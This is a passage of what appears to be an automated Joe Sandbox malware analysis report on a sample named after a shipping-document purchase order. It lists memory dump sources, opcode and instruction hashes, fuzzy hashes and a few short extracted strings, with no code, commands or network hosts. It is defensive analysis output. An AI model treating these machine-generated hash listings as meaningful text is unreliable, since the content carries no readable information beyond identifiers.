                      • Opcode Fuzzy Hash: aa1e98226e0fc4ccc10b36e05cbfd30d129e4919404e53eac638e1c0c2af24cb
                      • Instruction Fuzzy Hash: 4031D030B002168FDB55AF74D65467E7BE6BF89200F208928D406DB396DE36DE45C791
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: |
                      • API String ID: 0-2343686810
                      • Opcode ID: 5934a79fb7abb77647c98fea10132c1a688818174fde499ffb8e3b3668571fb1
                      • Instruction ID: 26ee3fadc44f037552a6cd85e2da524dd504fdba5d8ba2352574d94858685ee9
                      • Opcode Fuzzy Hash: 5934a79fb7abb77647c98fea10132c1a688818174fde499ffb8e3b3668571fb1
                      • Instruction Fuzzy Hash: 1F117F74B402259FDB54EF789904B9E77F6AF4CB10F108469E60AE73A4DB359D008B90
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: |
                      • API String ID: 0-2343686810
                      • Opcode ID: d23122692d65ad75880ad366f2f3c580aeaa72517671e8a30f3da7042554047a
                      • Instruction ID: e2e9cb0339a3b89729449b7d1e369653b9e177362ca5abc455c27754fb01e623
                      • Opcode Fuzzy Hash: d23122692d65ad75880ad366f2f3c580aeaa72517671e8a30f3da7042554047a
                      • Instruction Fuzzy Hash: 18115E70B40225DFDB44AF789914B6E77F6AF4C710F108469E60AD73A4DB3599008B90
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d0e147f2508fddd51b3384767a99e71a80d9db7b22cae5690048afc09a9f23d5
                      • Instruction ID: f689b077bdb5d77f49c41c6fa432f3e608c1c6f55aab36f5a795da24b3ad27ad
                      • Opcode Fuzzy Hash: d0e147f2508fddd51b3384767a99e71a80d9db7b22cae5690048afc09a9f23d5
                      • Instruction Fuzzy Hash: AA817D30B0021A8FDF54DFA8D5546AEB7F6EF89310F108529E50ADB399EB34DC428B91
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3d1442f482e665ffae598510858157b579dc528540b36c54a69aa3b0d0fbffcc
                      • Instruction ID: fb8c74c647553cb2edb331ba31307670541ad2149082398603d99fb02342c7bb
                      • Opcode Fuzzy Hash: 3d1442f482e665ffae598510858157b579dc528540b36c54a69aa3b0d0fbffcc
                      • Instruction Fuzzy Hash: B561F3B1F001224FDF519B7DC88466EBADBAFD4610B244439E80ADB379DE65DC0287C1
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0c84304eeb140390e3d27d72741e8bb0ca36c8ccf56c96d156ae79ffd4c5a1e7
                      • Instruction ID: 9808c3820753cc2ebfef583d40ca67aa5f508ad957a09a3022edcec9aaa9dee8
                      • Opcode Fuzzy Hash: 0c84304eeb140390e3d27d72741e8bb0ca36c8ccf56c96d156ae79ffd4c5a1e7
                      • Instruction Fuzzy Hash: 46914E30E1061A8FDF60DF68C890B9DB7B1FF89300F208699D549BB295DB70AA85CF50
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 522c4bf573a9ebf3ee377184c321231f42db1fdc90f36a855fdb41ecace0140f
                      • Instruction ID: cf089d7ac59e8797b39fdff8bf194cd76b6c85f64199ae6a560b485197645a31
                      • Opcode Fuzzy Hash: 522c4bf573a9ebf3ee377184c321231f42db1fdc90f36a855fdb41ecace0140f
                      • Instruction Fuzzy Hash: F4913E30E1061A8BDF60DF68C890B9DB7B1FF89310F208599D549BB395DB70AA85CF90
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5fbba2680362b82f3d34f0b4dec4e0c9e185959a8dfd93ab751e30cd792af916
                      • Instruction ID: d3165c9051606f313170ba322ba6e8ef355457800cb5e02fae2509a005c941ee
                      • Opcode Fuzzy Hash: 5fbba2680362b82f3d34f0b4dec4e0c9e185959a8dfd93ab751e30cd792af916
                      • Instruction Fuzzy Hash: 87714870A002199FCB55DFA8D980AAEFBF6FF88304F248529E505AB355DB30ED46CB50
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dd0c4a643cef6a68522f651b29809c09157531e3d0feea0110f20c08536878c2
                      • Instruction ID: 97451d1f3bb2c4aa6200567bee9095262f9dea70391fb8687da59258c7097f79
                      • Opcode Fuzzy Hash: dd0c4a643cef6a68522f651b29809c09157531e3d0feea0110f20c08536878c2
                      • Instruction Fuzzy Hash: EA711970A002199FCB55DFA9D994AAEBBF6FF84300F248529E405AB355DB30ED46CB50
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d620f426b4cdb7e6b577164d028bb480eaa6b0e78d67fbb1af495d7618db76f0
                      • Instruction ID: 53fe979c8b89e12fc06302a9618c6b5bebce35af9adafed4c79d69abc98f569f
                      • Opcode Fuzzy Hash: d620f426b4cdb7e6b577164d028bb480eaa6b0e78d67fbb1af495d7618db76f0
                      • Instruction Fuzzy Hash: DF51D031E4011ADFDF64AF78E5446BDBBB2EF84315F208869D50AE7350DB3A8965CB80
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2afac7981fb22ac4485a7b425b1e8922ee2cc74c1210c885941b6b6958bd78be
                      • Instruction ID: 6033c070c414a63b2e11f3e8ad23ff913d0fb4610f5c33f57f68694d73760013
                      • Opcode Fuzzy Hash: 2afac7981fb22ac4485a7b425b1e8922ee2cc74c1210c885941b6b6958bd78be
                      • Instruction Fuzzy Hash: 3251EC30B502158FEF655A6CDA9473F36AFE789300F204929E40ED37E8DA2DCC954791
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0f95af8aee583b8b823a15dba123c974eff97f84c2c31365cdc76b0a664c6c6c
                      • Instruction ID: f1f17266dfe3b5bf9c47a2a6532de7fd6c85739298d53f0aa0cbffb2c737409d
                      • Opcode Fuzzy Hash: 0f95af8aee583b8b823a15dba123c974eff97f84c2c31365cdc76b0a664c6c6c
                      • Instruction Fuzzy Hash: 9D51E930B502258FEF656A6CD99473F36AFE789300F204929E50ED37E8DA2DCC9547A1
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5ccd03cc22445a58cbfc70e5f0f964f2aa249376b7a188f2134bdab1e72b1593
                      • Instruction ID: 44bede21a169559f1eebb9a386fbb7aa0ad8621eda29e18a5d7dc823251201bd
                      • Opcode Fuzzy Hash: 5ccd03cc22445a58cbfc70e5f0f964f2aa249376b7a188f2134bdab1e72b1593
                      • Instruction Fuzzy Hash: 79416B71E1061A8FEB70CFA9DD81ABEFBF1EB44314F10492AD256D7640D330A9458B91
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3d3f13cd298794e6e53c210b1db2aad5543c6d9d32b3c55953425cda7a8da862
                      • Instruction ID: d2c9237fa04e26a3bc82d797edd4bd6d2f4458ae6f2ad9edc0faa012a5030d69
                      • Opcode Fuzzy Hash: 3d3f13cd298794e6e53c210b1db2aad5543c6d9d32b3c55953425cda7a8da862
                      • Instruction Fuzzy Hash: 9531CF30E102169BCB58CF64D954AAEBBF6FF89300F108929E916E7355DB71ED82CB50
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c39897e90638f026c10774baa4eea5ca12ca0c5eee85a51377e7668fc7267af5
                      • Instruction ID: 28f7847fabdd43e7ebb19e5befcdc5287b67b9b4afa1e69dace569d8d25b81bb
                      • Opcode Fuzzy Hash: c39897e90638f026c10774baa4eea5ca12ca0c5eee85a51377e7668fc7267af5
                      • Instruction Fuzzy Hash: BF319A30E102169BCB58CF64D994AAEB7F6FF89300F108929E916E7355DB71ED82CB50
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d1e11986c3b5a21d77eea8a83c0d344cda42a26d62a5844ee66ac5975c7dee47
                      • Instruction ID: 3020606d173751206acf595630ce2c202ba461557e93f0cbdda4680c061662ce
                      • Opcode Fuzzy Hash: d1e11986c3b5a21d77eea8a83c0d344cda42a26d62a5844ee66ac5975c7dee47
                      • Instruction Fuzzy Hash: C8219F75F0121A9FDB50DF68DA80AEEB7F5AB48320F10852AE905E7354E734D940CB90
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 05ba4e1e492884df64a77195b8f5d06c742bb4002f93f7ac8b19035e3d720f24
                      • Instruction ID: 105a041d1fabe00d731b04e4582fd4c6cfb9f7bafe8642af96396654dd94130c
                      • Opcode Fuzzy Hash: 05ba4e1e492884df64a77195b8f5d06c742bb4002f93f7ac8b19035e3d720f24
                      • Instruction Fuzzy Hash: 73215C75F0061A9FDB50DF69DA80AAEBBF5FB48720F10812AE905E7354E734D940CB90
                      Memory Dump Source
                      • Source File: 00000001.00000002.4197131380.000000000290D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0290D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_290d000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3062c8afd061fb4dc360d9e0df47a329ac934a383528c967ea064ac2260592c1
                      • Instruction ID: abad83b4a39dac1773be10a8105bf27e6f3195be8aa5b7042eea0d273e4b1170
                      • Opcode Fuzzy Hash: 3062c8afd061fb4dc360d9e0df47a329ac934a383528c967ea064ac2260592c1
                      • Instruction Fuzzy Hash: A521F271604208DFDB14DF54D9C0F26BBB5EB84314F24C969E84E4B296C37AD846CA72
                      Memory Dump Source
                      • Source File: 00000001.00000002.4197131380.000000000290D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0290D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_290d000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 176428b4cf0a3ea85567892ac6d22f0f41f1e705c2711b22e9cb7e9498b8eed4
                      • Instruction ID: 81a4d00e55d1c49114af18dd1e987be8220e643b7cf4e687b132bcc305055db3
                      • Opcode Fuzzy Hash: 176428b4cf0a3ea85567892ac6d22f0f41f1e705c2711b22e9cb7e9498b8eed4
                      • Instruction Fuzzy Hash: F3210471604208DFDB48DF54C9C0B26BFAAFB88318F20C56DE8094B291CB36D846C671
                      Memory Dump Source
                      • Source File: 00000001.00000002.4197131380.000000000290D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0290D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_290d000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 924288f866f68599779ea86aade4a55ff89481ff376ad11ff5206eec6ddf17ae
                      • Instruction ID: 7edca0be15f0a40b1415353419e6ba890811ddab0c9847861fbff18cc869f49c
                      • Opcode Fuzzy Hash: 924288f866f68599779ea86aade4a55ff89481ff376ad11ff5206eec6ddf17ae
                      • Instruction Fuzzy Hash: 7D21487110D3C49FCB038B64D990B11BF75EB46214F29C5DBD8898F2A7C33A980ACB62
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c6e6adb98762f7e3d1e127355a2d818cb016e9125ed8a0558b42891e13adb6f7
                      • Instruction ID: 73edaa27e4597d24e7eaf0df89a2cf695d35c35ec1eac39f9d8d40c162e3be12
                      • Opcode Fuzzy Hash: c6e6adb98762f7e3d1e127355a2d818cb016e9125ed8a0558b42891e13adb6f7
                      • Instruction Fuzzy Hash: C021B430F1012A9FCF94EB69E9546ADB7B6EF84314F20852AE505DB354DB30ED518B80
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 07a9ac36be08fc37ac4b3f01bc6178aea0a26b77a2cb98cfae74cabcf996daec
                      • Instruction ID: 99800fd12c47f5ae2f1af39e0b22f5253b488ee76c471815c28cfab05b2368a0
                      • Opcode Fuzzy Hash: 07a9ac36be08fc37ac4b3f01bc6178aea0a26b77a2cb98cfae74cabcf996daec
                      • Instruction Fuzzy Hash: 0E019230B041220FD7619A7DD95076BF7DBDBC6A24F24886AE509C7396DE29CD0643A1
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cd744b49e2668cad991ef2274a809a3ca096f4de59392b702cb9c666b6fb0822
                      • Instruction ID: cc7528667f073dcaa030c04cdd23c3702a163dc401cbca0e513254e0095310ab
                      • Opcode Fuzzy Hash: cd744b49e2668cad991ef2274a809a3ca096f4de59392b702cb9c666b6fb0822
                      • Instruction Fuzzy Hash: 8D116135B1052A8BDF549A79D914ABE73ABEBC8610F004539D506E7358EE29DC018BD1
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0a1dcc9213cf9e9f99faaa751c6564b47a6ffe94ea1621c3a58377e2d998cdbe
                      • Instruction ID: fda5792c6ab695f9a251701b2cfd303736a0bd2a8e867e5c697a96a34db07fb6
                      • Opcode Fuzzy Hash: 0a1dcc9213cf9e9f99faaa751c6564b47a6ffe94ea1621c3a58377e2d998cdbe
                      • Instruction Fuzzy Hash: AB11B531F001225FD7A1DA3CE95067BB7E6EB85710F548C2EE28ACB395DA25DD028791
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 77d519bee592777e3ac1699435331a497054b445842d39501ac6616e6a8353f8
                      • Instruction ID: c38e1bbaff4706a9e215e22c2196fa333fe0e1e69be2925f94010917cadce9f7
                      • Opcode Fuzzy Hash: 77d519bee592777e3ac1699435331a497054b445842d39501ac6616e6a8353f8
                      • Instruction Fuzzy Hash: A901F731F002220FCB66DE7C995073EBBD6DBC5720F248C2AE10ACB395EA25CC024391
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0b320561e182c26fce186ca81bee833bdab19869aefd7c9c29916db2e2be3a7e
                      • Instruction ID: 963c335b2a5acaad77c577a881f402b2c42a62201548bc66072da5c0aeabaaeb
                      • Opcode Fuzzy Hash: 0b320561e182c26fce186ca81bee833bdab19869aefd7c9c29916db2e2be3a7e
                      • Instruction Fuzzy Hash: 2D21CFB5D01219EFCB00DF9AD985ADEFBB4FB48320F10852AE518B7250D374A554CFA5
                      Memory Dump Source
                      • Source File: 00000001.00000002.4197131380.000000000290D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0290D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_290d000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                      • Instruction ID: 7206d9bfa9062f7b03b9141b89df6aaf9ad90b2ad259f29463f493ad775ab53c
                      • Opcode Fuzzy Hash: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                      • Instruction Fuzzy Hash: 0C11BF75504284CFDB09CF54D9C4B15BFB2FB88318F24C6ADD8494B696C33AD84ACB61
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3c87c0d3fa8a66efc4d10934f67a05f233340af485c436d2e7d525aa2fb0061f
                      • Instruction ID: 2d8c726942b6b5db950b010b1ec4d5c7e47e2ee7b582054de09844af8f0859a9
                      • Opcode Fuzzy Hash: 3c87c0d3fa8a66efc4d10934f67a05f233340af485c436d2e7d525aa2fb0061f
                      • Instruction Fuzzy Hash: C611AFB5D01259AFCB00DF9AD884ADEFBB4FB48324F10812AE918A7250D374A954CFA5
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7431f65106a893eba77f0b86eb45a956a57424ff313e4e2b8e2192d6d3b3fa76
                      • Instruction ID: e79b487c536e21408674984d44b2413e960e3b81dcc6d85388f3c72665be03d3
                      • Opcode Fuzzy Hash: 7431f65106a893eba77f0b86eb45a956a57424ff313e4e2b8e2192d6d3b3fa76
                      • Instruction Fuzzy Hash: 2E018131B000220BDB64997DD45473BF3DBDBC9B20F20883AEA0AC7388EE69DC064391
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ba880d3c327684c99c607caeb5a217a09dfa64bce8a05ebee707852302353c38
                      • Instruction ID: 62d4ecbd8b21cb017819ccd656819d618160beedc96fa5431b69608c47305109
                      • Opcode Fuzzy Hash: ba880d3c327684c99c607caeb5a217a09dfa64bce8a05ebee707852302353c38
                      • Instruction Fuzzy Hash: 9601F736B100268BDF54DE68CA14AFE73AFDBC8610F04053AC106E3344EE24C90287D0
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 508c1151328f45c1140b8f2555661acf38bdefbccee3cb31edaa3219a6d89e90
                      • Instruction ID: 2efd96119f59c1e33d9a261fd47be515134e7b03ea3f3957720278a9e98747ae
                      • Opcode Fuzzy Hash: 508c1151328f45c1140b8f2555661acf38bdefbccee3cb31edaa3219a6d89e90
                      • Instruction Fuzzy Hash: EC01AF31B004221BCB659A7DA89473FA7DBDBC9B60F248839E60AC7359EE25DC024391
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 91efb2c30f52419a1fd2eb5dc0616b2b01099ab53a52a60706fb30147f1415e5
                      • Instruction ID: c383ad4cc68c53102bd032df829aa6c8378d737ff509f408d695ffb367c16b21
                      • Opcode Fuzzy Hash: 91efb2c30f52419a1fd2eb5dc0616b2b01099ab53a52a60706fb30147f1415e5
                      • Instruction Fuzzy Hash: 2A018131B000255FDBA0AA7DE95073AB3DAEB85714F548839E60EC7788EE25DC0187D1
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ce62fb5cae47c140bc1a8479820e898a8d50ef20659361b0246bdad5391d5fad
                      • Instruction ID: ab7c978c5c61d02487344ad5e49adf55ae80c998af65769853f5fce74099f6cc
                      • Opcode Fuzzy Hash: ce62fb5cae47c140bc1a8479820e898a8d50ef20659361b0246bdad5391d5fad
                      • Instruction Fuzzy Hash: 20F0A032F20238ABDB656965E800AAFB73AE794754F104529E901E7384DB32A8108BC0
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bd4f8b994e2fcd7014e6188f62956ff0b8ed52110ac32045c01ffa2ec465b098
                      • Instruction ID: 7a9ec972b1689ccaa5c3b254db33d456aecee4ba53a64914cb13f1f5834dbb3f
                      • Opcode Fuzzy Hash: bd4f8b994e2fcd7014e6188f62956ff0b8ed52110ac32045c01ffa2ec465b098
                      • Instruction Fuzzy Hash: 3CE0D871D151559BDB60CF70CB857AE77A9EB42304F2049EAD049CB181E637CA029B00
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1324371161
                      • Opcode ID: 7c509e632c93ca1dcf903c46ce2ca8a978e0346044b7b02802d01a50bd583453
                      • Instruction ID: 68c1b20588d15ba77cf34524adbb0dae7382795831dd94c3407d24a5d219eed0
                      • Opcode Fuzzy Hash: 7c509e632c93ca1dcf903c46ce2ca8a978e0346044b7b02802d01a50bd583453
                      • Instruction Fuzzy Hash: 45122130E0122ACFDB68DF65DA9466EB7F2BF84304F208569D509AB365DB349D85CF80
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0oNp$DqNp$PHkq
                      • API String ID: 0-4000632471
                      • Opcode ID: bd7cedeebfaa55b602604a6b739520eaf69f9f6de3ab4c9d6d5129459286bc32
                      • Instruction ID: 989bbb62cb449cbbc2e9ac51a44dc1cfa3c0260dc214c56cfcb0a3edcab67f2d
                      • Opcode Fuzzy Hash: bd7cedeebfaa55b602604a6b739520eaf69f9f6de3ab4c9d6d5129459286bc32
                      • Instruction Fuzzy Hash: 3422C230B101168FDB54DB68D984A6DB7F2FF88310F148969D506DB3A6DB35EC85CB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: XPpq$\Opq
                      • API String ID: 0-2429731126
                      • Opcode ID: 547d222a03148fb4eb780284b98b10ddf40b25cbf8bd4ee47530b9574a6c8ac7
                      • Instruction ID: 1ba4c4c53c28621d236bc7e93ff4e241647cdc3e49adc71b6f976662bfbaa8d5
                      • Opcode Fuzzy Hash: 547d222a03148fb4eb780284b98b10ddf40b25cbf8bd4ee47530b9574a6c8ac7
                      • Instruction Fuzzy Hash: 04E10431B101258FEB54DB68C894AAEBBF2FF89310F25846AE546DB392DA31DC45C790
                      Memory Dump Source
